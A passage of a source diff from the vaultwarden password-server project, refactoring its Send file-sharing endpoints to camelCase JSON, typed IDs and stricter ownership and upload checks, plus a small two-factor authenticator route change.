UpdateType::SyncSendCreate,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&headers.device.uuid,
|
&headers.device,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
@@ -195,7 +210,7 @@ async fn post_send(data: JsonUpcase<SendData>, headers: Headers, mut conn: DbCon
|
|||||||
|
|
||||||
#[derive(FromForm)]
|
#[derive(FromForm)]
|
||||||
struct UploadData<'f> {
|
struct UploadData<'f> {
|
||||||
model: Json<crate::util::UpCase<SendData>>,
|
model: Json<SendData>,
|
||||||
data: TempFile<'f>,
|
data: TempFile<'f>,
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -207,15 +222,17 @@ struct UploadDataV2<'f> {
|
|||||||
// @deprecated Mar 25 2021: This method has been deprecated in favor of direct uploads (v2).
|
// @deprecated Mar 25 2021: This method has been deprecated in favor of direct uploads (v2).
|
||||||
// This method still exists to support older clients, probably need to remove it sometime.
|
// This method still exists to support older clients, probably need to remove it sometime.
|
||||||
// Upstream: https://github.com/bitwarden/server/blob/d0c793c95181dfb1b447eb450f85ba0bfd7ef643/src/Api/Controllers/SendsController.cs#L164-L167
|
// Upstream: https://github.com/bitwarden/server/blob/d0c793c95181dfb1b447eb450f85ba0bfd7ef643/src/Api/Controllers/SendsController.cs#L164-L167
|
||||||
|
// 2025: This endpoint doesn't seem to exists anymore in the latest version
|
||||||
|
// See: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/Tools/Controllers/SendsController.cs
|
||||||
#[post("/sends/file", format = "multipart/form-data", data = "<data>")]
|
#[post("/sends/file", format = "multipart/form-data", data = "<data>")]
|
||||||
async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
||||||
enforce_disable_send_policy(&headers, &mut conn).await?;
|
enforce_disable_send_policy(&headers, &mut conn).await?;
|
||||||
|
|
||||||
let UploadData {
|
let UploadData {
|
||||||
model,
|
model,
|
||||||
mut data,
|
data,
|
||||||
} = data.into_inner();
|
} = data.into_inner();
|
||||||
let model = model.into_inner().data;
|
let model = model.into_inner();
|
||||||
|
|
||||||
let Some(size) = data.len().to_i64() else {
|
let Some(size) = data.len().to_i64() else {
|
||||||
err!("Invalid send size");
|
err!("Invalid send size");
|
||||||
@@ -252,20 +269,15 @@ async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn:
|
|||||||
err!("Send content is not a file");
|
err!("Send content is not a file");
|
||||||
}
|
}
|
||||||
|
|
||||||
let file_id = crate::crypto::generate_send_id();
|
let file_id = crate::crypto::generate_send_file_id();
|
||||||
let folder_path = tokio::fs::canonicalize(&CONFIG.sends_folder()).await?.join(&send.uuid);
|
|
||||||
let file_path = folder_path.join(&file_id);
|
|
||||||
tokio::fs::create_dir_all(&folder_path).await?;
|
|
||||||
|
|
||||||
if let Err(_err) = data.persist_to(&file_path).await {
|
save_temp_file(PathType::Sends, &format!("{}/{file_id}", send.uuid), data, true).await?;
|
||||||
data.move_copy_to(file_path).await?
|
|
||||||
}
|
|
||||||
|
|
||||||
let mut data_value: Value = serde_json::from_str(&send.data)?;
|
let mut data_value: Value = serde_json::from_str(&send.data)?;
|
||||||
if let Some(o) = data_value.as_object_mut() {
|
if let Some(o) = data_value.as_object_mut() {
|
||||||
o.insert(String::from("Id"), Value::String(file_id));
|
o.insert(String::from("id"), Value::String(file_id));
|
||||||
o.insert(String::from("Size"), Value::Number(size.into()));
|
o.insert(String::from("size"), Value::Number(size.into()));
|
||||||
o.insert(String::from("SizeName"), Value::String(crate::util::get_display_size(size)));
|
o.insert(String::from("sizeName"), Value::String(crate::util::get_display_size(size)));
|
||||||
}
|
}
|
||||||
send.data = serde_json::to_string(&data_value)?;
|
send.data = serde_json::to_string(&data_value)?;
|
||||||
|
|
||||||
@@ -275,7 +287,7 @@ async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn:
|
|||||||
UpdateType::SyncSendCreate,
|
UpdateType::SyncSendCreate,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&headers.device.uuid,
|
&headers.device,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
@@ -283,20 +295,20 @@ async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn:
|
|||||||
Ok(Json(send.to_json()))
|
Ok(Json(send.to_json()))
|
||||||
}
|
}
|
||||||
|
|
||||||
// Upstream: https://github.com/bitwarden/server/blob/d0c793c95181dfb1b447eb450f85ba0bfd7ef643/src/Api/Controllers/SendsController.cs#L190
|
// Upstream: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/Tools/Controllers/SendsController.cs#L165
|
||||||
#[post("/sends/file/v2", data = "<data>")]
|
#[post("/sends/file/v2", data = "<data>")]
|
||||||
async fn post_send_file_v2(data: JsonUpcase<SendData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn post_send_file_v2(data: Json<SendData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
enforce_disable_send_policy(&headers, &mut conn).await?;
|
enforce_disable_send_policy(&headers, &mut conn).await?;
|
||||||
|
|
||||||
let data = data.into_inner().data;
|
let data = data.into_inner();
|
||||||
|
|
||||||
if data.Type != SendType::File as i32 {
|
if data.r#type != SendType::File as i32 {
|
||||||
err!("Send content is not a file");
|
err!("Send content is not a file");
|
||||||
}
|
}
|
||||||
|
|
||||||
enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;
|
enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;
|
||||||
|
|
||||||
let file_length = match &data.FileLength {
|
let file_length = match &data.file_length {
|
||||||
Some(m) => m.into_i64()?,
|
Some(m) => m.into_i64()?,
|
||||||
_ => err!("Invalid send length"),
|
_ => err!("Invalid send length"),
|
||||||
};
|
};
|
||||||
@@ -327,13 +339,13 @@ async fn post_send_file_v2(data: JsonUpcase<SendData>, headers: Headers, mut con
|
|||||||
|
|
||||||
let mut send = create_send(data, headers.user.uuid)?;
|
let mut send = create_send(data, headers.user.uuid)?;
|
||||||
|
|
||||||
let file_id = crate::crypto::generate_send_id();
|
let file_id = crate::crypto::generate_send_file_id();
|
||||||
|
|
||||||
let mut data_value: Value = serde_json::from_str(&send.data)?;
|
let mut data_value: Value = serde_json::from_str(&send.data)?;
|
||||||
if let Some(o) = data_value.as_object_mut() {
|
if let Some(o) = data_value.as_object_mut() {
|
||||||
o.insert(String::from("Id"), Value::String(file_id.clone()));
|
o.insert(String::from("id"), Value::String(file_id.clone()));
|
||||||
o.insert(String::from("Size"), Value::Number(file_length.into()));
|
o.insert(String::from("size"), Value::Number(file_length.into()));
|
||||||
o.insert(String::from("SizeName"), Value::String(crate::util::get_display_size(file_length)));
|
o.insert(String::from("sizeName"), Value::String(crate::util::get_display_size(file_length)));
|
||||||
}
|
}
|
||||||
send.data = serde_json::to_string(&data_value)?;
|
send.data = serde_json::to_string(&data_value)?;
|
||||||
send.save(&mut conn).await?;
|
send.save(&mut conn).await?;
|
||||||
@@ -341,16 +353,24 @@ async fn post_send_file_v2(data: JsonUpcase<SendData>, headers: Headers, mut con
|
|||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"fileUploadType": 0, // 0 == Direct | 1 == Azure
|
"fileUploadType": 0, // 0 == Direct | 1 == Azure
|
||||||
"object": "send-fileUpload",
|
"object": "send-fileUpload",
|
||||||
"url": format!("/sends/{}/file/{}", send.uuid, file_id),
|
"url": format!("/sends/{}/file/{file_id}", send.uuid),
|
||||||
"sendResponse": send.to_json()
|
"sendResponse": send.to_json()
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
// https://github.com/bitwarden/server/blob/d0c793c95181dfb1b447eb450f85ba0bfd7ef643/src/Api/Controllers/SendsController.cs#L243
|
#[derive(Deserialize)]
|
||||||
#[post("/sends/<send_uuid>/file/<file_id>", format = "multipart/form-data", data = "<data>")]
|
#[allow(non_snake_case)]
|
||||||
|
pub struct SendFileData {
|
||||||
|
id: SendFileId,
|
||||||
|
size: u64,
|
||||||
|
fileName: String,
|
||||||
|
}
|
||||||
|
|
||||||
|
// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/Tools/Controllers/SendsController.cs#L195
|
||||||
|
#[post("/sends/<send_id>/file/<file_id>", format = "multipart/form-data", data = "<data>")]
|
||||||
async fn post_send_file_v2_data(
|
async fn post_send_file_v2_data(
|
||||||
send_uuid: &str,
|
send_id: SendId,
|
||||||
file_id: &str,
|
file_id: SendFileId,
|
||||||
data: Form<UploadDataV2<'_>>,
|
data: Form<UploadDataV2<'_>>,
|
||||||
headers: Headers,
|
headers: Headers,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
@@ -358,32 +378,58 @@ async fn post_send_file_v2_data(
|
|||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
enforce_disable_send_policy(&headers, &mut conn).await?;
|
enforce_disable_send_policy(&headers, &mut conn).await?;
|
||||||
|
|
||||||
let mut data = data.into_inner();
|
let data = data.into_inner();
|
||||||
|
|
||||||
let Some(send) = Send::find_by_uuid(send_uuid, &mut conn).await else {
|
let Some(send) = Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await else {
|
||||||
err!("Send not found. Unable to save the file.")
|
err!("Send not found. Unable to save the file.", "Invalid send uuid or does not belong to user.")
|
||||||
};
|
};
|
||||||
|
|
||||||
let Some(send_user_id) = &send.user_uuid else {
|
if send.atype != SendType::File as i32 {
|
||||||
err!("Sends are only supported for users at the moment")
|
err!("Send is not a file type send.");
|
||||||
|
}
|
||||||
|
|
||||||
|
let Ok(send_data) = serde_json::from_str::<SendFileData>(&send.data) else {
|
||||||
|
err!("Unable to decode send data as json.")
|
||||||
};
|
};
|
||||||
if send_user_id != &headers.user.uuid {
|
|
||||||
err!("Send doesn't belong to user");
|
match data.data.raw_name() {
|
||||||
|
Some(raw_file_name)
|
||||||
|
if raw_file_name.dangerous_unsafe_unsanitized_raw() == send_data.fileName
|
||||||
|
// be less strict only if using CLI, cf. https://github.com/dani-garcia/vaultwarden/issues/5614
|
||||||
|
|| (headers.device.is_cli() && send_data.fileName.ends_with(raw_file_name.dangerous_unsafe_unsanitized_raw().as_str())
|
||||||
|
) => {}
|
||||||
|
Some(raw_file_name) => err!(
|
||||||
|
"Send file name does not match.",
|
||||||
|
format!(
|
||||||
|
"Expected file name '{}' got '{}'",
|
||||||
|
send_data.fileName,
|
||||||
|
raw_file_name.dangerous_unsafe_unsanitized_raw()
|
||||||
|
)
|
||||||
|
),
|
||||||
|
_ => err!("Send file name does not match or is not provided."),
|
||||||
}
|
}
|
||||||
|
|
||||||
let folder_path = tokio::fs::canonicalize(&CONFIG.sends_folder()).await?.join(send_uuid);
|
if file_id != send_data.id {
|
||||||
let file_path = folder_path.join(file_id);
|
err!("Send file does not match send data.", format!("Expected id {} got {file_id}", send_data.id));
|
||||||
tokio::fs::create_dir_all(&folder_path).await?;
|
|
||||||
|
|
||||||
if let Err(_err) = data.data.persist_to(&file_path).await {
|
|
||||||
data.data.move_copy_to(file_path).await?
|
|
||||||
}
|
}
|
||||||
|
|
||||||
|
let Some(size) = data.data.len().to_u64() else {
|
||||||
|
err!("Send file size overflow.");
|
||||||
|
};
|
||||||
|
|
||||||
|
if size != send_data.size {
|
||||||
|
err!("Send file size does not match.", format!("Expected a file size of {} got {size}", send_data.size));
|
||||||
|
}
|
||||||
|
|
||||||
|
let file_path = format!("{send_id}/{file_id}");
|
||||||
|
|
||||||
|
save_temp_file(PathType::Sends, &file_path, data.data, false).await?;
|
||||||
|
|
||||||
nt.send_send_update(
|
nt.send_send_update(
|
||||||
UpdateType::SyncSendCreate,
|
UpdateType::SyncSendCreate,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&headers.device.uuid,
|
&headers.device,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
@@ -392,22 +438,21 @@ async fn post_send_file_v2_data(
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
pub struct SendAccessData {
|
pub struct SendAccessData {
|
||||||
pub Password: Option<String>,
|
pub password: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/sends/access/<access_id>", data = "<data>")]
|
#[post("/sends/access/<access_id>", data = "<data>")]
|
||||||
async fn post_access(
|
async fn post_access(
|
||||||
access_id: &str,
|
access_id: &str,
|
||||||
data: JsonUpcase<SendAccessData>,
|
data: Json<SendAccessData>,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
ip: ClientIp,
|
ip: ClientIp,
|
||||||
nt: Notify<'_>,
|
nt: Notify<'_>,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
let mut send = match Send::find_by_access_id(access_id, &mut conn).await {
|
let Some(mut send) = Send::find_by_access_id(access_id, &mut conn).await else {
|
||||||
Some(s) => s,
|
err_code!(SEND_INACCESSIBLE_MSG, 404)
|
||||||
None => err_code!(SEND_INACCESSIBLE_MSG, 404),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if let Some(max_access_count) = send.max_access_count {
|
if let Some(max_access_count) = send.max_access_count {
|
||||||
@@ -431,7 +476,7 @@ async fn post_access(
|
|||||||
}
|
}
|
||||||
|
|
||||||
if send.password_hash.is_some() {
|
if send.password_hash.is_some() {
|
||||||
match data.into_inner().data.Password {
|
match data.into_inner().password {
|
||||||
Some(ref p) if send.check_password(p) => { /* Nothing to do here */ }
|
Some(ref p) if send.check_password(p) => { /* Nothing to do here */ }
|
||||||
Some(_) => err!("Invalid password", format!("IP: {}.", ip.ip)),
|
Some(_) => err!("Invalid password", format!("IP: {}.", ip.ip)),
|
||||||
None => err_code!("Password not provided", format!("IP: {}.", ip.ip), 401),
|
None => err_code!("Password not provided", format!("IP: {}.", ip.ip), 401),
|
||||||
@@ -449,7 +494,7 @@ async fn post_access(
|
|||||||
UpdateType::SyncSendUpdate,
|
UpdateType::SyncSendUpdate,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&String::from("00000000-0000-0000-0000-000000000000"),
|
&ANON_PUSH_DEVICE,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
@@ -459,16 +504,15 @@ async fn post_access(
|
|||||||
|
|
||||||
#[post("/sends/<send_id>/access/file/<file_id>", data = "<data>")]
|
#[post("/sends/<send_id>/access/file/<file_id>", data = "<data>")]
|
||||||
async fn post_access_file(
|
async fn post_access_file(
|
||||||
send_id: &str,
|
send_id: SendId,
|
||||||
file_id: &str,
|
file_id: SendFileId,
|
||||||
data: JsonUpcase<SendAccessData>,
|
data: Json<SendAccessData>,
|
||||||
host: Host,
|
host: Host,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
nt: Notify<'_>,
|
nt: Notify<'_>,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
let mut send = match Send::find_by_uuid(send_id, &mut conn).await {
|
let Some(mut send) = Send::find_by_uuid(&send_id, &mut conn).await else {
|
||||||
Some(s) => s,
|
err_code!(SEND_INACCESSIBLE_MSG, 404)
|
||||||
None => err_code!(SEND_INACCESSIBLE_MSG, 404),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if let Some(max_access_count) = send.max_access_count {
|
if let Some(max_access_count) = send.max_access_count {
|
||||||
@@ -492,7 +536,7 @@ async fn post_access_file(
|
|||||||
}
|
}
|
||||||
|
|
||||||
if send.password_hash.is_some() {
|
if send.password_hash.is_some() {
|
||||||
match data.into_inner().data.Password {
|
match data.into_inner().password {
|
||||||
Some(ref p) if send.check_password(p) => { /* Nothing to do here */ }
|
Some(ref p) if send.check_password(p) => { /* Nothing to do here */ }
|
||||||
Some(_) => err!("Invalid password."),
|
Some(_) => err!("Invalid password."),
|
||||||
None => err_code!("Password not provided", 401),
|
None => err_code!("Password not provided", 401),
|
||||||
@@ -507,22 +551,33 @@ async fn post_access_file(
|
|||||||
UpdateType::SyncSendUpdate,
|
UpdateType::SyncSendUpdate,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&String::from("00000000-0000-0000-0000-000000000000"),
|
&ANON_PUSH_DEVICE,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
|
|
||||||
let token_claims = crate::auth::generate_send_claims(send_id, file_id);
|
|
||||||
let token = crate::auth::encode_jwt(&token_claims);
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Object": "send-fileDownload",
|
"object": "send-fileDownload",
|
||||||
"Id": file_id,
|
"id": file_id,
|
||||||
"Url": format!("{}/api/sends/{}/{}?t={}", &host.host, send_id, file_id, token)
|
"url": download_url(&host, &send_id, &file_id).await?,
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
|
async fn download_url(host: &Host, send_id: &SendId, file_id: &SendFileId) -> Result<String, crate::Error> {
|
||||||
|
let operator = CONFIG.opendal_operator_for_path_type(PathType::Sends)?;
|
||||||
|
|
||||||
|
if operator.info().scheme() == opendal::Scheme::Fs {
|
||||||
|
let token_claims = crate::auth::generate_send_claims(send_id, file_id);
|
||||||
|
let token = crate::auth::encode_jwt(&token_claims);
|
||||||
|
|
||||||
|
Ok(format!("{}/api/sends/{send_id}/{file_id}?t={token}", &host.host))
|
||||||
|
} else {
|
||||||
|
Ok(operator.presign_read(&format!("{send_id}/{file_id}"), Duration::from_secs(5 * 60)).await?.uri().to_string())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
#[get("/sends/<send_id>/<file_id>?<t>")]
|
#[get("/sends/<send_id>/<file_id>?<t>")]
|
||||||
async fn download_send(send_id: SafeString, file_id: SafeString, t: &str) -> Option<NamedFile> {
|
async fn download_send(send_id: SendId, file_id: SendFileId, t: &str) -> Option<NamedFile> {
|
||||||
if let Ok(claims) = crate::auth::decode_send(t) {
|
if let Ok(claims) = crate::auth::decode_send(t) {
|
||||||
if claims.sub == format!("{send_id}/{file_id}") {
|
if claims.sub == format!("{send_id}/{file_id}") {
|
||||||
return NamedFile::open(Path::new(&CONFIG.sends_folder()).join(send_id).join(file_id)).await.ok();
|
return NamedFile::open(Path::new(&CONFIG.sends_folder()).join(send_id).join(file_id)).await.ok();
|
||||||
@@ -531,37 +586,55 @@ async fn download_send(send_id: SafeString, file_id: SafeString, t: &str) -> Opt
|
|||||||
None
|
None
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/sends/<id>", data = "<data>")]
|
#[put("/sends/<send_id>", data = "<data>")]
|
||||||
async fn put_send(
|
async fn put_send(
|
||||||
id: &str,
|
send_id: SendId,
|
||||||
data: JsonUpcase<SendData>,
|
data: Json<SendData>,
|
||||||
headers: Headers,
|
headers: Headers,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
nt: Notify<'_>,
|
nt: Notify<'_>,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
enforce_disable_send_policy(&headers, &mut conn).await?;
|
enforce_disable_send_policy(&headers, &mut conn).await?;
|
||||||
|
|
||||||
let data: SendData = data.into_inner().data;
|
let data: SendData = data.into_inner();
|
||||||
enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;
|
enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;
|
||||||
|
|
||||||
let mut send = match Send::find_by_uuid(id, &mut conn).await {
|
let Some(mut send) = Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await else {
|
||||||
Some(s) => s,
|
err!("Send not found", "Send send_id is invalid or does not belong to user")
|
||||||
None => err!("Send not found"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
|
update_send_from_data(&mut send, data, &headers, &mut conn, &nt, UpdateType::SyncSendUpdate).await?;
|
||||||
|
|
||||||
|
Ok(Json(send.to_json()))
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn update_send_from_data(
|
||||||
|
send: &mut Send,
|
||||||
|
data: SendData,
|
||||||
|
headers: &Headers,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
nt: &Notify<'_>,
|
||||||
|
ut: UpdateType,
|
||||||
|
) -> EmptyResult {
|
||||||
if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
|
if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
|
||||||
err!("Send is not owned by user")
|
err!("Send is not owned by user")
|
||||||
}
|
}
|
||||||
|
|
||||||
if send.atype != data.Type {
|
if send.atype != data.r#type {
|
||||||
err!("Sends can't change type")
|
err!("Sends can't change type")
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if data.deletion_date > Utc::now() + TimeDelta::try_days(31).unwrap() {
|
||||||
|
err!(
|
||||||
|
"You cannot have a Send with a deletion date that far into the future. Adjust the Deletion Date to a value less than 31 days from now and try again."
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
// When updating a file Send, we receive nulls in the File field, as it's immutable,
|
// When updating a file Send, we receive nulls in the File field, as it's immutable,
|
||||||
// so we only need to update the data field in the Text case
|
// so we only need to update the data field in the Text case
|
||||||
if data.Type == SendType::Text as i32 {
|
if data.r#type == SendType::Text as i32 {
|
||||||
let data_str = if let Some(mut d) = data.Text {
|
let data_str = if let Some(mut d) = data.text {
|
||||||
d.as_object_mut().and_then(|d| d.remove("Response"));
|
d.as_object_mut().and_then(|d| d.remove("response"));
|
||||||
serde_json::to_string(&d)?
|
serde_json::to_string(&d)?
|
||||||
} else {
|
} else {
|
||||||
err!("Send data not provided");
|
err!("Send data not provided");
|
||||||
@@ -569,58 +642,42 @@ async fn put_send(
|
|||||||
send.data = data_str;
|
send.data = data_str;
|
||||||
}
|
}
|
||||||
|
|
||||||
if data.DeletionDate > Utc::now() + Duration::days(31) {
|
send.name = data.name;
|
||||||
err!(
|
send.akey = data.key;
|
||||||
"You cannot have a Send with a deletion date that far into the future. Adjust the Deletion Date to a value less than 31 days from now and try again."
|
send.deletion_date = data.deletion_date.naive_utc();
|
||||||
);
|
send.notes = data.notes;
|
||||||
}
|
send.max_access_count = match data.max_access_count {
|
||||||
send.name = data.Name;
|
|
||||||
send.akey = data.Key;
|
|
||||||
send.deletion_date = data.DeletionDate.naive_utc();
|
|
||||||
send.notes = data.Notes;
|
|
||||||
send.max_access_count = match data.MaxAccessCount {
|
|
||||||
Some(m) => Some(m.into_i32()?),
|
Some(m) => Some(m.into_i32()?),
|
||||||
_ => None,
|
_ => None,
|
||||||
};
|
};
|
||||||
send.expiration_date = data.ExpirationDate.map(|d| d.naive_utc());
|
send.expiration_date = data.expiration_date.map(|d| d.naive_utc());
|
||||||
send.hide_email = data.HideEmail;
|
send.hide_email = data.hide_email;
|
||||||
send.disabled = data.Disabled;
|
send.disabled = data.disabled;
|
||||||
|
|
||||||
// Only change the value if it's present
|
// Only change the value if it's present
|
||||||
if let Some(password) = data.Password {
|
if let Some(password) = data.password {
|
||||||
send.set_password(Some(&password));
|
send.set_password(Some(&password));
|
||||||
}
|
}
|
||||||
|
|
||||||
send.save(&mut conn).await?;
|
send.save(conn).await?;
|
||||||
nt.send_send_update(
|
if ut != UpdateType::None {
|
||||||
UpdateType::SyncSendUpdate,
|
nt.send_send_update(ut, send, &send.update_users_revision(conn).await, &headers.device, conn).await;
|
||||||
&send,
|
}
|
||||||
&send.update_users_revision(&mut conn).await,
|
Ok(())
|
||||||
&headers.device.uuid,
|
|
||||||
&mut conn,
|
|
||||||
)
|
|
||||||
.await;
|
|
||||||
|
|
||||||
Ok(Json(send.to_json()))
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#[delete("/sends/<id>")]
|
#[delete("/sends/<send_id>")]
|
||||||
async fn delete_send(id: &str, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
async fn delete_send(send_id: SendId, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
||||||
let send = match Send::find_by_uuid(id, &mut conn).await {
|
let Some(send) = Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await else {
|
||||||
Some(s) => s,
|
err!("Send not found", "Invalid send uuid, or does not belong to user")
|
||||||
None => err!("Send not found"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
|
|
||||||
err!("Send is not owned by user")
|
|
||||||
}
|
|
||||||
|
|
||||||
send.delete(&mut conn).await?;
|
send.delete(&mut conn).await?;
|
||||||
nt.send_send_update(
|
nt.send_send_update(
|
||||||
UpdateType::SyncSendDelete,
|
UpdateType::SyncSendDelete,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&headers.device.uuid,
|
&headers.device,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
@@ -628,26 +685,21 @@ async fn delete_send(id: &str, headers: Headers, mut conn: DbConn, nt: Notify<'_
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/sends/<id>/remove-password")]
|
#[put("/sends/<send_id>/remove-password")]
|
||||||
async fn put_remove_password(id: &str, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
async fn put_remove_password(send_id: SendId, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
||||||
enforce_disable_send_policy(&headers, &mut conn).await?;
|
enforce_disable_send_policy(&headers, &mut conn).await?;
|
||||||
|
|
||||||
let mut send = match Send::find_by_uuid(id, &mut conn).await {
|
let Some(mut send) = Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await else {
|
||||||
Some(s) => s,
|
err!("Send not found", "Invalid send uuid, or does not belong to user")
|
||||||
None => err!("Send not found"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
|
|
||||||
err!("Send is not owned by user")
|
|
||||||
}
|
|
||||||
|
|
||||||
send.set_password(None);
|
send.set_password(None);
|
||||||
send.save(&mut conn).await?;
|
send.save(&mut conn).await?;
|
||||||
nt.send_send_update(
|
nt.send_send_update(
|
||||||
UpdateType::SyncSendUpdate,
|
UpdateType::SyncSendUpdate,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&headers.device.uuid,
|
&headers.device,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
|
|||||||
@@ -3,14 +3,11 @@ use rocket::serde::json::Json;
|
|||||||
use rocket::Route;
|
use rocket::Route;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{
|
api::{core::log_user_event, core::two_factor::_generate_recover_code, EmptyResult, JsonResult, PasswordOrOtpData},
|
||||||
core::log_user_event, core::two_factor::_generate_recover_code, EmptyResult, JsonResult, JsonUpcase,
|
|
||||||
PasswordOrOtpData,
|
|
||||||
},
|
|
||||||
auth::{ClientIp, Headers},
|
auth::{ClientIp, Headers},
|
||||||
crypto,
|
crypto,
|
||||||
db::{
|
db::{
|
||||||
models::{EventType, TwoFactor, TwoFactorType},
|
models::{EventType, TwoFactor, TwoFactorType, UserId},
|
||||||
DbConn,
|
DbConn,
|
||||||
},
|
},
|
||||||
util::NumberOrString,
|
util::NumberOrString,
|
||||||
@@ -19,12 +16,12 @@ use crate::{
|
|||||||
pub use crate::config::CONFIG;
|
pub use crate::config::CONFIG;
|
||||||
|
|
||||||
pub fn routes() -> Vec<Route> {
|
pub fn routes() -> Vec<Route> {
|
||||||
routes![generate_authenticator, activate_authenticator, activate_authenticator_put,]
|
routes![generate_authenticator, activate_authenticator, activate_authenticator_put, disable_authenticator]
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/get-authenticator", data = "<data>")]
|
#[post("/two-factor/get-authenticator", data = "<data>")]
|
||||||
async fn generate_authenticator(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn generate_authenticator(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: PasswordOrOtpData = data.into_inner().data;
|
let data: PasswordOrOtpData = data.into_inner();
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
data.validate(&user, false, &mut conn).await?;
|
data.validate(&user, false, &mut conn).await?;
|
||||||
@@ -37,37 +34,37 @@ async fn generate_authenticator(data: JsonUpcase<PasswordOrOtpData>, headers: He
|
|||||||
_ => (false, crypto::encode_random_bytes::<20>(BASE32)),
|
_ => (false, crypto::encode_random_bytes::<20>(BASE32)),
|
||||||
};
|
};
|
||||||
|
|
||||||
|
// Upstream seems to also return `userVerificationToken`, but doesn't seem to be used at all.
|
||||||
|
